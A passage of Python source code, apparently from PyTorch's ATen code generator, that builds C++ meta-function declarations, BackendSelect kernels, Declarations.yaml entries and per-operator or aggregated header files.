    """Render the structured_<op> meta-class declaration for MetaFunctions.h,
    or None if the group is not structured.

    For ops with precomputed elements, additionally emits a templated
    `precompute_out` struct whose bool template parameters track (at compile
    time) which elements have been set.
    """
    if not g.structured:
        return None
    with native_function_manager(g.out):
        name = meta.name(g)
        args = structured.meta_arguments(g)
        args_str = ', '.join(a.decl() for a in args)
        parent_class = g.out.structured_inherits
        if parent_class is None:
            parent_class = "at::impl::MetaBase"
        meta_return = "void"
        precomputed = g.out.precomputed if g.structured else None
        if precomputed:
            # Generate the template declaration with one bool parameter for each
            # precomputed element. Each parameter is true if the corresponding (in
            # terms of position) precomputed element has been set.
            precomputed_values = [*precomputed.replace.values(), precomputed.add]
            precomputed_elements = [elem for replace_list in precomputed_values for elem in replace_list]
            precomputed_template_parameters = [elem.name.upper() for elem in precomputed_elements]
            precomputed_template_params_str = ", ".join(f"bool {param} = false" for param in precomputed_template_parameters)
            precompute_template_decl = f"template <{precomputed_template_params_str}>"

            # Generate a string containing declarations of all precomputed elements.
            precomputed_elements_with_cpp_types = [
                structured.argument_type(elem, binds=elem.name)
                for elem in precomputed_elements
            ]
            precomputed_elements_decl = ";\n".join(
                f"{elem.cpp_type(strip_ref=True)} {elem.name}" for elem in precomputed_elements_with_cpp_types
            )

            # Generate "setter" methods for each precomputed element. Each method will return
            # a new instance of precompute_out with the template parameter that corresponds to
            # the member set by the method to true (to indicate that it has been set).
            setter_methods = []
            for i, elem in enumerate(precomputed_elements):
                # Generate the signature. The return type will be the same
                # as the type of `this` but with the template parameter
                # corresponding to the element set by this method set to true.
                # The assert generated below will ensure that this template
                # parameter is false on the type of `this`.
                return_ty_templates = ", ".join(
                    precomputed_template_parameters[:i] + ["true"] + precomputed_template_parameters[i + 1:]
                )
                return_ty = f"precompute_out<{return_ty_templates}>"
                elem_cpp_ty = precomputed_elements_with_cpp_types[i].cpp_type(strip_ref=True)
                signature = f"{return_ty} set_{elem.name}({elem_cpp_ty} value)"

                # Generate an assert which checks that the
                # template parameter corresponding to the precomputed
                # element that is set by this method is false on the
                # class corresponding to the object that `this` points to.
                # This ensures that each element can be set only once.
                assert_msg = f"\"{precomputed_elements[i].name} already set\""
                assert_stmt = f"static_assert({precomputed_template_parameters[i]} == false, {assert_msg});"

                # Generate the new object construction block. All state
                # except the element that this method sets is copied from the
                # object that `this` points to. The value for the element that
                # the method sets is taken from a method parameter.
                construction_stmts = []
                construction_stmts.append(f"{return_ty} ret;")
                for j, elem in enumerate(precomputed_elements):
                    if i == j:
                        construction_stmts.append(f"ret.{elem.name} = value;")
                    else:
                        construction_stmts.append(f"ret.{elem.name} = this->{elem.name};")
                construction_stmts.append("return ret;")
                construction_block = "\n".join(construction_stmts)

                setter_methods.append(f"""
{signature} {{
    {assert_stmt}
    {construction_block}
}}
""")
            setter_methods_decl = "\n".join(setter_methods)

            # Meta should return an instance of the struct containing the precomputed elements.
            meta_return_template_params = ", ".join(["true"] * len(precomputed_template_parameters))
            # This typedef (actually a using statement) is needed so that TORCH_META_FUNC can reuse the return
            # type (which has a variable number of template parameters).
            meta_return_typedef = f"using meta_return_ty = precompute_out <{meta_return_template_params}>;"
            meta_return = "meta_return_ty"
            precomputed_decl = f"""
{precompute_template_decl}
struct TORCH_API precompute_out {{
    {setter_methods_decl}
    {precomputed_elements_decl};
}};"""
        else:
            meta_return_typedef = ""
            precomputed_decl = ""

        return f"""\
struct TORCH_API structured_{name} : public {parent_class} {{
{precomputed_decl}
{meta_return_typedef}
{meta_return} meta({args_str});
}};
"""
def needs_backend_select(f: NativeFunction, selector: SelectiveBuilder) -> bool:
    """Decide whether a BackendSelect kernel should be generated for *f*.

    Only selected operators that carry TensorOptions arguments qualify;
    `*_like` and `new_*` operators are excluded.
    """
    op_name = str(f.func.name.name)
    is_excluded = op_name.endswith('_like') or op_name.startswith('new_')
    if is_excluded or f.func.arguments.tensor_options is None:
        return False
    return selector.is_native_function_selected(f)
# Generates RegisterBackendSelect.cpp, a series of kernels which provide
# specialized computation of dispatch key for operator signatures which cannot
# be easily done automatically using templating.
@dataclass(frozen=True)
class ComputeBackendSelect:
    """Emits the per-operator pieces of RegisterBackendSelect.cpp: kernels that
    compute the dispatch key from dtype/layout/device (plus any tensor args)
    and redispatch, or the registration lines for those kernels."""
    # Whether we emit the kernel definition or its registration.
    target: Union[
        Literal[Target.DEFINITION],
        Literal[Target.REGISTRATION]
    ]

    # Selector object to determine which operators to generate
    # registration code for.
    selector: SelectiveBuilder

    @method_with_native_function
    def __call__(self, f: NativeFunction) -> Optional[str]:
        # Operators without TensorOptions (or deselected ones) get no kernel.
        if not needs_backend_select(f, self.selector):
            return None
        name = native.name(f.func)
        native_sig = NativeSignature(f.func)

        # Tensor-like arguments contribute to the multi-dispatch key set below.
        native_tensor_args = [
            a for a in native_sig.arguments()
            if isinstance(a.argument, Argument) and a.argument.type.is_tensor_like()
        ]

        dispatcher_sig = DispatcherSignature.from_schema(f.func)

        sig: Union[NativeSignature, DispatcherSignature]
        sig = dispatcher_sig
        dispatcher_exprs = dispatcher_sig.exprs()
        # C++ expression computing the key from the TensorOptions components.
        dispatch_key = "c10::computeDispatchKey(dtype, layout, device)"

        if self.target is Target.DEFINITION:
            # I don't think there's actually a good reason to generate
            # these two cases differently
            # The first case could probably be improved though- it calls computeDispatchKeySet(),
            # which looks at TLS dispatch keys- there should not be any by the time we reach backend select.
            if native_tensor_args:
                tensor_args = ', '.join(a.name for a in native_tensor_args)
                compute_dk = f"""\
DispatchKeySet _dk_set = c10::DispatchKeySet({dispatch_key}) | c10::detail::multi_dispatch_key_set({tensor_args});
DispatchKeySet _dk_mask = c10::DispatchKeySet(DispatchKeySet::FULL_AFTER, DispatchKey::BackendSelect);
DispatchKeySet _dk = c10::impl::computeDispatchKeySet(_dk_set, _dk_mask);"""
            else:
                compute_dk = f"DispatchKeySet _dk = c10::DispatchKeySet({dispatch_key});"
            return f"""\
// aten::{f.func}
C10_ALWAYS_INLINE
{sig.defn(name)} {{
{compute_dk}
return at::_ops::{f.func.name.unambiguous_name()}::redispatch(
_dk, {', '.join(a.expr for a in dispatcher_exprs)});
}}
"""
        elif self.target is Target.REGISTRATION:
            return f"""m.impl("aten::{f.func.name}", TORCH_FN({name}));"""
        else:
            assert_never(self.target)
# ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ #
#
# YAML CODE GENERATION
#
# ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ #
def format_yaml(data: object) -> str:
    """Serialize *data* to YAML in the form expected by Declarations.yaml consumers."""
    # Never emit YAML anchors/aliases; downstream parsers don't handle them.
    YamlDumper.ignore_aliases = lambda self, data: True  # type: ignore[assignment]

    # Teach the dumper to serialize OrderedDict like a plain mapping,
    # preserving insertion order.
    def represent_ordered_dict(dumper: Any, data: Any) -> Any:
        return dumper.represent_dict(data.items())
    YamlDumper.add_representer(OrderedDict, represent_ordered_dict)  # type: ignore[no-untyped-call]

    # Some yaml parsers (e.g. Haskell's) don't understand line breaks.
    # An effectively-infinite width disables optional wrapping, which
    # improves portability of the emitted YAML.
    return yaml.dump(data, default_flow_style=False, Dumper=YamlDumper, width=1e9)  # type: ignore[no-any-return]
# For some reason, some defaults we write to YAML are written as native
# YAML objects, rather than doing them uniformly as strings. This
# function detects those cases and converts them into native Python
# objects.
def pythonify_default(s: str) -> object:
    """Convert a YAML-style default string into a native Python object.

    'true'/'false' become booleans; numeric strings become int (preferred)
    or float; everything else is returned unchanged.
    """
    booleans = {'true': True, 'false': False}
    if s in booleans:
        return booleans[s]
    # Try int before float so integral strings stay integral.
    for convert in (int, float):
        try:
            return convert(s)
        except ValueError:
            continue
    return s
# What is a dynamic type? Over time, the semantic meaning of
# dynamic type has degraded to meaninglessness (in the old days,
# it captured dtype-ness of types, but that has gone away with
# the removal of TH). These days, it's mostly the same thing as
# the C++ API argument type, except that Tensor and Tensor?
# arguments simply present as Tensor.
#
# TODO: Get rid of dynamic_type, after getting tools/autograd
# to use the new codegen framework
def dynamic_type(t: Type) -> str:
    """Compute the legacy 'dynamic type' string for *t*.

    Nowadays this is mostly the C++ API argument type, except that Tensor
    and Tensor? both present as plain at::Tensor.
    """
    # Optionality is erased: unwrap nested OptionalType layers.
    while isinstance(t, OptionalType):
        t = t.elem
    # Note we don't use t.is_tensor_like() here because it would
    # also include Tensor[]
    if str(t) == 'Tensor':
        return 'at::Tensor'
    return cpp.argumenttype_type(t, mutable=False, binds='__placeholder__').cpp_type()
def compute_method_of_yaml(variants: Set[Variant]) -> List[str]:
    """Build the 'method_of' list for a Declarations.yaml entry.

    Order is significant: 'Type' always comes first, then 'Tensor',
    then 'namespace'.
    """
    candidates = [
        ('Type', True),
        ('Tensor', Variant.method in variants),
        ('namespace', Variant.function in variants),
    ]
    return [label for label, present in candidates if present]
def compute_returns_yaml(f: NativeFunction) -> Tuple[List[Dict[str, str]], Dict[str, str]]:
    """Compute the 'returns' list for a Declarations.yaml entry, plus a map
    from out-argument name to return field_name (see the note below)."""
    # Note [name and field_name]
    # ~~~~~~~~~~~~~~~~~~~~~~~~~~
    # To understand name_to_field_name, we must first talk about this
    # schema:
    #
    #   lstsq.X(Tensor self, Tensor A, *, Tensor(a!) X, Tensor(b!) qr) -> (Tensor(a!) solution, Tensor(b!) QR)
    #
    # There is something very odd about this schema: it is an out
    # variant of the function (that is to say, it will convert into
    # at::lstsq_out() in the C++ API), but the names of the output
    # return arguments don't match the keyword argument names of
    # the inputs. It TURNS OUT that in this situation, the historical
    # Declarations.yaml we want to output is this (abbreviated to
    # only show relevant fields):
    #
    #   arguments:
    #     ...
    #   - field_name: solution
    #     name: X
    #   - field_name: QR
    #     name: qr
    #     ...
    #
    #   returns:
    #   - field_name: solution
    #     name: X
    #   - field_name: QR
    #     name: qr
    #
    # The name of the return fields is stored in 'field_name', and the
    # name of the arguments is stored in 'name'. So when we process
    # arguments, we need a way to get at the corresponding return. At
    # the moment, this is most conveniently done by constructing a
    # mapping from name (the argument concept) to field_name (the
    # return concept) while processing return arguments, since we don't
    # directly maintain this correspondence in the modeling of function
    # schema itself.
    #
    # See also https://github.com/pytorch/pytorch/issues/43114
    name_to_field_name: Dict[str, str] = {}

    # Compute the returns field of the YAML entry
    names = cpp.return_names(f)
    returns = []
    for i, (r, name) in enumerate(zip(f.func.returns, names)):
        ret = {
            'dynamic_type': dynamic_type(r.type),
            'name': name,
            'type': cpp.return_type(r).cpp_type(),
        }

        if r.name:
            # See Note [name and field_name]
            ret['field_name'] = r.name
            # For out functions, the i-th out argument corresponds to the
            # i-th return, which is how the mapping is built positionally.
            if f.func.is_out_fn():
                name_to_field_name[f.func.arguments.out[i].name] = r.name

        returns.append(ret)

    return returns, name_to_field_name
# arguments in yaml roughly corresponds to the public C++ API
def compute_cpp_argument_yaml(cpp_a: Binding, *, schema_order: bool, kwarg_only_set: Set[str],
                              out_arg_set: Set[str], name_to_field_name: Dict[str, str]) -> object:
    """Render a single C++-API binding as a Declarations.yaml argument dict.

    TensorOptions bindings get a hand-written entry (they have no single
    underlying JIT argument); plain Arguments delegate to
    compute_argument_yaml. SelfArgument should never occur here since
    these signatures are generated with method=False.
    """
    if isinstance(cpp_a.argument, TensorOptionsArguments):
        arg: Dict[str, object] = {
            'annotation': None,
            'dynamic_type': 'at::TensorOptions',
            'is_nullable': False,
            'name': cpp_a.name,
            'type': cpp_a.type,
            'kwarg_only': True,
        }
        if cpp_a.default is not None:
            arg['default'] = cpp_a.default
        return arg
    elif isinstance(cpp_a.argument, SelfArgument):
        raise AssertionError()
    elif isinstance(cpp_a.argument, Argument):
        return compute_argument_yaml(
            cpp_a.argument, schema_order=schema_order,
            kwarg_only_set=kwarg_only_set, out_arg_set=out_arg_set, name_to_field_name=name_to_field_name)
    else:
        # Previously this fell off the end and implicitly returned None for
        # an unexpected binding type; fail loudly (and exhaustively) instead,
        # matching the assert_never style used elsewhere in this file.
        assert_never(cpp_a.argument)
def compute_argument_yaml(a: Argument, *, schema_order: bool, kwarg_only_set: Set[str],
                          out_arg_set: Set[str], name_to_field_name: Dict[str, str]) -> object:
    """Render a single JIT argument as a Declarations.yaml argument dict."""
    arg: Dict[str, object] = {
        'annotation': str(a.annotation) if a.annotation else None,
        'dynamic_type': dynamic_type(a.type),
        'is_nullable': a.type.is_nullable(),
        'name': a.name,
        'type': cpp.argument_type(a, binds="__placeholder__").cpp_type(),
    }
    if a.default is not None:
        arg['default'] = pythonify_default(cpp.default_expr(a.default, a.type))
    if a.name in kwarg_only_set:
        arg['kwarg_only'] = True
    if a.name in out_arg_set:
        # Out arguments are also flagged as allocatable outputs.
        arg['output'] = True
        arg['allocate'] = True
    # See Note [name and field_name]
    field_name = name_to_field_name.get(a.name)
    if field_name is not None:
        arg['field_name'] = field_name
    # Historically, booleans don't get their size recorded, because it
    # is already built into the cpp type (e.g., std::array<bool, 4>)
    list_info = a.type.is_list_like()
    if list_info is not None and list_info.size is not None and str(list_info.elem) != 'bool':
        arg['size'] = list_info.size
    return arg
@with_native_function
def compute_declaration_yaml(f: NativeFunction) -> object:
    """Render one NativeFunction as a full Declarations.yaml entry.

    Returns an OrderedDict because field order in the emitted YAML is part
    of the historical output format.
    """
    returns, name_to_field_name = compute_returns_yaml(f)

    # These sets are used to conveniently test if an argument is a
    # kwarg-only or out argument
    kwarg_only_set = set(a.name for a in f.func.arguments.flat_kwarg_only)
    out_arg_set = set(a.name for a in f.func.arguments.out)

    sig_group = CppSignatureGroup.from_native_function(f, method=False, fallback_binding=False)
    cpp_args = sig_group.signature.arguments()
    arguments = [
        compute_cpp_argument_yaml(
            cpp_a, schema_order=False,
            kwarg_only_set=kwarg_only_set, out_arg_set=out_arg_set, name_to_field_name=name_to_field_name)
        for cpp_a in cpp_args
    ]

    schema_order_jit_arguments = list(f.func.schema_order_arguments())

    schema_order_arguments = [
        compute_argument_yaml(
            a, schema_order=True,
            kwarg_only_set=kwarg_only_set, out_arg_set=out_arg_set, name_to_field_name=name_to_field_name)
        for a in schema_order_jit_arguments
    ]

    cpp_schema_order_types = [
        # NB: method here doesn't matter
        r.type for a in schema_order_jit_arguments
        for r in cpp.argument(
            a, method=False, cpp_no_default_args=set(), faithful=False, has_tensor_options=False)
    ]

    cpp_returns = cpp.returns_type(f.func.returns).cpp_type()
    schema_order_cpp_signature = f"{cpp_returns} ({', '.join(cpp_schema_order_types)})"

    # A "factory method" takes TensorOptions in the C++ API but has no
    # Tensor method variant.
    is_factory_method = any(isinstance(a.argument, TensorOptionsArguments) for a in cpp_args) \
        and Variant.method not in f.variants

    return OrderedDict([
        ('name', cpp.name(f.func)),
        ('operator_name', str(f.func.name.name)),
        ('overload_name', str(f.func.name.overload_name)),
        ('manual_kernel_registration', f.manual_kernel_registration),
        ('category_override', f.category_override if f.category_override is not None else ''),
        ('schema_string', f'aten::{f.func}'),
        ('arguments', arguments),
        ('schema_order_cpp_signature', schema_order_cpp_signature),
        ('schema_order_arguments', schema_order_arguments),
        ('method_of', compute_method_of_yaml(f.variants)),
        ('mode', 'native'),
        ('python_module', '' if f.python_module is None else f.python_module),
        ('returns', returns),
        ('inplace', f.func.name.name.inplace),
        ('is_factory_method', is_factory_method),
        ('abstract', f.is_abstract),
        ('device_guard', f.device_guard),
        ('with_gil', False),
        ('deprecated', False),
        ('has_math_kernel', f.has_composite_implicit_autograd_kernel),
    ])
# See Note [Auto generated composite kernels]
def has_autogenerated_composite_kernel(f: NativeFunction) -> bool:
    """True if codegen auto-generates a composite kernel for this function.

    See Note [Auto generated composite kernels].
    """
    is_structured = f.structured or f.structured_delegate is not None
    return is_structured and f.func.kind() in (SchemaKind.functional, SchemaKind.inplace)
@with_native_function_and_indices
def compute_registration_declarations(f: NativeFunction, backend_indices: Dict[DispatchKey, BackendIndex]) -> str:
    """Render one line of RegistrationDeclarations.h: the C++ declaration of
    the operator's kernel, followed by a JSON comment with metadata consumed
    by downstream tooling."""
    name = dispatcher.name(f.func)
    returns_type = dispatcher.returns_type(f.func.returns).cpp_type_registration_declarations()
    args = dispatcher.arguments(f.func)
    args_str = ', '.join(a.no_default().decl_registration_declarations() for a in args)
    comment_data : Dict[str, str] = {
        'schema': f'aten::{f.func}',
        # TODO: What exactly is the semantics of the 'dispatch' field?
        # (here: "has any kernel registration beyond CompositeImplicitAutograd")
        'dispatch': str({k for k, v in backend_indices.items() if v.has_kernel(f)} != {DispatchKey.CompositeImplicitAutograd}),
        'default': str(f.has_composite_kernel or has_autogenerated_composite_kernel(f))
    }
    return f"""{returns_type} {name}({args_str}); // {json.dumps(comment_data)}
"""
# ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ #
#
# RUN IT ALL
#
# ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ #
def get_custom_build_selector(
        provided_op_registration_allowlist: Optional[List[str]],
        op_selection_yaml_path: Optional[str]) -> SelectiveBuilder:
    """Build the operator SelectiveBuilder for a custom build.

    At most one of the two sources may be provided; with neither, a no-op
    selector (everything selected) is returned.
    """
    assert provided_op_registration_allowlist is None or op_selection_yaml_path is None, (
        "Both provided_op_registration_allowlist and "
        "op_selection_yaml_path can NOT be provided at the "
        "same time.")

    if provided_op_registration_allowlist is not None:
        return SelectiveBuilder.from_legacy_op_registration_allow_list(
            set(provided_op_registration_allowlist),
            True,
            False,
        )
    if op_selection_yaml_path is not None:
        return SelectiveBuilder.from_yaml_path(op_selection_yaml_path)
    return SelectiveBuilder.get_nop_selector()
def pre_group_native_functions(
        native_functions: Sequence[NativeFunction]) -> Dict[FunctionSchema, Dict[SchemaKind, NativeFunction]]:
    """Bucket native functions by signature, then by schema kind within each bucket."""
    grouped: Dict[FunctionSchema, Dict[SchemaKind, NativeFunction]] = defaultdict(dict)
    for fn in native_functions:
        bucket = grouped[fn.func.signature()]
        kind = fn.func.kind()
        # Each (signature, kind) pair must be unique across native_functions.
        assert kind not in bucket
        bucket[kind] = fn
    return grouped
def get_grouped_native_functions(
        native_functions: Sequence[NativeFunction]) -> Sequence[Union[NativeFunction, NativeFunctionsGroup]]:
    """Collapse functional/inplace/out variants into NativeFunctionsGroup where possible."""
    def flatten_pre_group(d: Dict[SchemaKind, NativeFunction]) -> Sequence[Union[NativeFunction, NativeFunctionsGroup]]:
        group = NativeFunctionsGroup.from_dict(d)
        # When no complete group can be formed, fall back to the ungrouped functions.
        return list(d.values()) if group is None else [group]

    # TODO: how come ValuesView isn't a Sequence lol
    pre_grouped = pre_group_native_functions(native_functions)
    return list(concatMap(flatten_pre_group, list(pre_grouped.values())))
def gen_aggregated_headers(
        *,
        native_functions: Sequence[NativeFunction],
        grouped_native_functions: Sequence[Union[NativeFunction, NativeFunctionsGroup]],
        static_dispatch_idx: Optional[BackendIndex],
        selector: SelectiveBuilder,
        backend_indices: Dict[DispatchKey, BackendIndex],
        cpu_fm: FileManager,
        cuda_fm: FileManager,
        functions_keys: Set[DispatchKey],
        dispatch_keys: Sequence[DispatchKey],
        rocm: bool,
) -> None:
    """Write the aggregated (one file per category) ATen headers.

    This is the Buck-build layout; the CMake layout is produced by
    gen_per_operator_headers instead.
    """
    # Buck doesn't support dynamic output files, so we aggregate all operator
    # headers into a single file
    structured_native_functions = [g for g in grouped_native_functions
                                   if isinstance(g, NativeFunctionsGroup)]
    cpu_fm.write('NativeMetaFunctions.h', lambda: {
        'NativeMetaFunctions_includes': [],
        'NativeMetaFunctions_declarations': list(
            mapMaybe(compute_meta_function_declaration, structured_native_functions)),
    })
    method_native_functions = [fn for fn in native_functions
                               if Variant.method in fn.variants]
    non_method_native_functions = [fn for fn in native_functions
                                   if fn not in method_native_functions]
    cpu_fm.write('MethodOperators.h', lambda: {
        'MethodOperators_includes': [],
        'MethodOperators_declarations': list(mapMaybe(ComputeOperators(
            Target.DECLARATION), method_native_functions)),
    })
    cpu_fm.write('Operators.h', lambda: {
        'Operators_includes': ['#include <ATen/MethodOperators.h>'],
        'Operators_declarations': list(mapMaybe(ComputeOperators(
            Target.DECLARATION), non_method_native_functions)),
    })
    cpu_fm.write('Functions.h', lambda: {
        'static_dispatch_extra_headers': static_dispatch_extra_headers(static_dispatch_idx),
        'Functions_includes': ['#include <ATen/Operators.h>'],
        'Functions_declarations': list(mapMaybe(ComputeFunction(
            static_dispatch_backend_index=static_dispatch_idx), native_functions)),
    })
    cpu_fm.write('NativeFunctions.h', lambda: {
        'NativeFunctions_includes': ['#include <ATen/NativeMetaFunctions.h>'],
        'NativeFunctions_declarations': list(concatMap(
            # Convert to a set first to remove duplicate kernel names.
            # Backends are allowed to repeat kernel names; only generate the declaration once!
            lambda f: list(OrderedDict.fromkeys(concatMap(
                lambda backend_idx:
                    dest.compute_native_function_declaration(f, backend_idx),
                backend_indices.values()))),
            grouped_native_functions)),
    })

    # Per-dispatch-key function headers; CUDA keys go to the CUDA FileManager.
    # NOTE: the lambdas below close over `dispatch_key`/`inl_headers`, which is
    # safe because write_with_template consumes them within this iteration.
    for dispatch_key in dispatch_keys:
        fm = cuda_fm if is_cuda_dispatch_key(dispatch_key) else cpu_fm
        if dispatch_key in functions_keys:
            if dispatch_key in static_dispatch_keys(static_dispatch_idx):
                # See Note [Avoiding Include Cycles In Static Dispatch]
                inl_headers = ''
            else:
                inl_headers = f'#include <ATen/{dispatch_key}Functions_inl.h>'

            fm.write_with_template(f'{dispatch_key}Functions.h', 'DispatchKeyFunctions.h', lambda: {
                'dispatch_key': str(dispatch_key),
                'inline_headers_for_nonstatic_build': inl_headers,
            })
            fm.write_with_template(f'{dispatch_key}Functions_inl.h', 'DispatchKeyFunctions_inl.h', lambda: {
                'DispatchKeyFunctions_inl_includes': [],
                'dispatch_namespace': dispatch_key.lower(),
                'dispatch_namespaced_declarations': list(concatMap(
                    dest.RegisterDispatchKey(
                        backend_indices[dispatch_key],
                        Target.NAMESPACED_DECLARATION,
                        selector,
                        rocm=rocm,
                        cpp_namespace='at::native',
                        class_method_name=None),
                    grouped_native_functions
                )),
            })

        del fm
def gen_per_operator_headers(
        *,
        native_functions: Sequence[NativeFunction],
        grouped_native_functions: Sequence[Union[NativeFunction, NativeFunctionsGroup]],
        static_dispatch_idx: Optional[BackendIndex],
        selector: SelectiveBuilder,
        backend_indices: Dict[DispatchKey, BackendIndex],
        cpu_fm: FileManager,
        cuda_fm: FileManager,
        ops_fm: FileManager,
        functions_keys: Set[DispatchKey],
        dispatch_keys: Sequence[DispatchKey],
        rocm: bool,
) -> None:
    """Write the per-operator header layout (one header per operator root name
    in ATen/ops), plus thin aggregated umbrella headers that include them."""
    # For CMake builds, split operator declarations into separate headers in
    # the ATen/ops folder to split up header dependencies
    functions_by_root_name: Dict[str, List[NativeFunction]] = defaultdict(lambda: [])
    for fn in native_functions:
        functions_by_root_name[fn.root_name].append(fn)

    grouped_functions_by_root_name: Dict[str, List[Union[NativeFunction, NativeFunctionsGroup]]] = defaultdict(lambda: [])
    for group in grouped_native_functions:
        name = group.root_name
        grouped_functions_by_root_name[name].append(group)

    # Per-operator headers: {name}_ops.h, {name}.h, {name}_meta.h (structured
    # only), {name}_native.h.  NOTE: the lambdas close over loop variables,
    # which is safe because write_with_template consumes them immediately.
    for name, functions in functions_by_root_name.items():
        ops_fm.write_with_template(
            f'{name}_ops.h', 'Operator.h', lambda: {
                'declarations': list(mapMaybe(ComputeOperators(
                    Target.DECLARATION), functions)),
            })

        ops_fm.write_with_template(
            f'{name}.h', 'Function.h', lambda: {
                'static_dispatch_ops_headers': list(mapMaybe(
                    lambda fn: static_dispatch_ops_header(fn, backend_index=static_dispatch_idx),
                    functions)),
                'operator_includes': f'#include <ATen/ops/{name}_ops.h>',
                'function_definitions': list(mapMaybe(ComputeFunction(
                    static_dispatch_backend_index=static_dispatch_idx), functions)),
            })

        grouped_functions = grouped_functions_by_root_name.get(name, [])
        structured_functions = [fn for fn in grouped_functions
                                if isinstance(fn, NativeFunctionsGroup) and fn.structured]
        is_structured = len(structured_functions) > 0

        if is_structured:
            ops_fm.write_with_template(
                f'{name}_meta.h', 'NativeMetaFunction.h', lambda: {
                    'meta_function_declarations': list(mapMaybe(
                        compute_meta_function_declaration, structured_functions)),
                })

        ops_fm.write_with_template(
            f'{name}_native.h', 'NativeFunction.h', lambda: {
                'extra_includes': (f'#include <ATen/ops/{name}_meta.h>'
                                   if is_structured else []),
                'native_function_declarations': list(concatMap(
                    # Convert to a set first to remove duplicate kernel names.
                    # Backends are allowed to repeat kernel names; only generate the declaration once!
                    lambda f: list(OrderedDict.fromkeys(concatMap(
                        lambda backend_idx:
                            dest.compute_native_function_declaration(f, backend_idx),
                        backend_indices.values()))),
                    grouped_functions)),
            })

    # Umbrella headers whose declarations all moved into the per-op files;
    # they now just include every per-op header of the matching suffix.
    for category, suffix in [
            ('Functions', ''),
            ('Operators', '_ops'),
            ('NativeMetaFunctions', '_meta'),
            ('NativeFunctions', '_native'),
    ]:
        cpu_fm.write(f'{category}.h', lambda: {
            'static_dispatch_extra_headers': [],
            f'{category}_includes': [
                f'#include <ATen/ops/{name}{suffix}.h>'
                for name in sorted(functions_by_root_name.keys())
            ],
            f'{category}_declarations': [],
        })

    # Per-dispatch-key headers: one per-op dispatch header for each op that has
    # declarations for this key, plus the key-level Functions/Functions_inl pair.
    for dispatch_key in dispatch_keys:
        if dispatch_key not in functions_keys:
            continue

        dispatch_namespace = dispatch_key.lower()
        dispatch_names = []

        for name, functions in functions_by_root_name.items():
            grouped_functions = grouped_functions_by_root_name.get(name, [])
            declarations = list(concatMap(
                dest.RegisterDispatchKey(
                    backend_indices[dispatch_key],
                    Target.NAMESPACED_DECLARATION,
                    selector,
                    rocm=rocm,
                    cpp_namespace='at::native',
                    class_method_name=None),
                grouped_functions
            ))

            # Skip ops with nothing registered for this dispatch key.
            if len(declarations) == 0:
                continue

            dispatch_names.append(name)
            ops_fm.write_with_template(
                f'{name}_{dispatch_namespace}_dispatch.h',
                'DispatchKeyFunction.h', lambda: {
                    'dispatch_namespace': dispatch_namespace,
                    'dispatch_namespaced_declarations': declarations,
                })

        fm = cuda_fm if is_cuda_dispatch_key(dispatch_key) else cpu_fm
        if dispatch_key in static_dispatch_keys(static_dispatch_idx):
            # See Note [Avoiding Include Cycles In Static Dispatch]
            inl_headers = ''
        else:
            inl_headers = f'#include <ATen/{dispatch_key}Functions_inl.h>'

        fm.write_with_template(f'{dispatch_key}Functions.h', 'DispatchKeyFunctions.h', lambda: {
            'dispatch_key': str(dispatch_key),
            'inline_headers_for_nonstatic_build': inl_headers,
        })
        fm.write_with_template(f'{dispatch_key}Functions_inl.h', 'DispatchKeyFunctions_inl.h', lambda: {
            'dispatch_namespace': dispatch_namespace,
            'DispatchKeyFunctions_inl_includes': [
                f'#include <ATen/ops/{name}_{dispatch_namespace}_dispatch.h>'
                for name in sorted(dispatch_names)
            ],
            'dispatch_namespaced_declarations': [],
        })
        del fm

    cpu_fm.write('MethodOperators.h', lambda: {
        'MethodOperators_includes': sorted(
            f'#include <ATen/ops/{name}_ops.h>'
            for name, functions in functions_by_root_name.items()
            if any(Variant.method in fn.variants for fn in functions)
        ),
        'MethodOperators_declarations': [],
    })
def gen_headers(
        *,
        native_functions: Sequence[NativeFunction],
        grouped_native_functions: Sequence[Union[NativeFunction, NativeFunctionsGroup]],
        static_dispatch_idx: Optional[BackendIndex],
        selector: SelectiveBuilder,
        backend_indices: Dict[DispatchKey, BackendIndex],
        core_fm: FileManager,
        cpu_fm: FileManager,
        cuda_fm: FileManager,
        ops_fm: FileManager,
        dispatch_keys: Sequence[DispatchKey],
        functions_keys: Set[DispatchKey],
        rocm: bool,
        per_operator_headers: bool,
) -> None:
    """Generate all ATen headers.

    Dispatches to the per-operator or aggregated layout for the operator
    headers, then writes the layout-independent headers (TensorBody.h,
    RedispatchFunctions.h, RegistrationDeclarations.h, FunctionalInverses.h,
    aten_interned_strings.h).
    """
    if per_operator_headers:
        gen_per_operator_headers(
            native_functions=native_functions,
            grouped_native_functions=grouped_native_functions,
            static_dispatch_idx=static_dispatch_idx,
            selector=selector,
            backend_indices=backend_indices,
            cpu_fm=cpu_fm,
            cuda_fm=cuda_fm,
            ops_fm=ops_fm,
            dispatch_keys=dispatch_keys,
            functions_keys=functions_keys,
            rocm=rocm,
        )
    else:
        gen_aggregated_headers(
            native_functions=native_functions,
            grouped_native_functions=grouped_native_functions,
            static_dispatch_idx=static_dispatch_idx,
            selector=selector,
            backend_indices=backend_indices,
            cpu_fm=cpu_fm,
            cuda_fm=cuda_fm,
            dispatch_keys=dispatch_keys,
            functions_keys=functions_keys,
            rocm=rocm,
        )

    # Static-dispatch headers needed by Tensor methods (per-operator layout only).
    def static_dispatch_method_headers() -> List[str]:
        return list(mapMaybe(
            lambda fn: static_dispatch_ops_header(fn, backend_index=static_dispatch_idx),
            [fn for fn in native_functions if Variant.method in fn.variants]))

    core_fm.write('TensorBody.h', lambda: {
        'static_dispatch_ops_headers': (
            static_dispatch_method_headers() if per_operator_headers
            else static_dispatch_extra_headers(static_dispatch_idx, skip_tensor_include=True)),
        'tensor_method_declarations': list(mapMaybe(ComputeTensorMethod(
            target=Target.DECLARATION, static_dispatch_backend_index=static_dispatch_idx), native_functions)),
        'tensor_method_definitions': list(mapMaybe(ComputeTensorMethod(
            target=Target.DEFINITION, static_dispatch_backend_index=static_dispatch_idx), native_functions)),
    })

    cpu_fm.write('RedispatchFunctions.h', lambda: {
        'function_redispatch_definitions': list(mapMaybe(ComputeRedispatchFunction(), native_functions)),
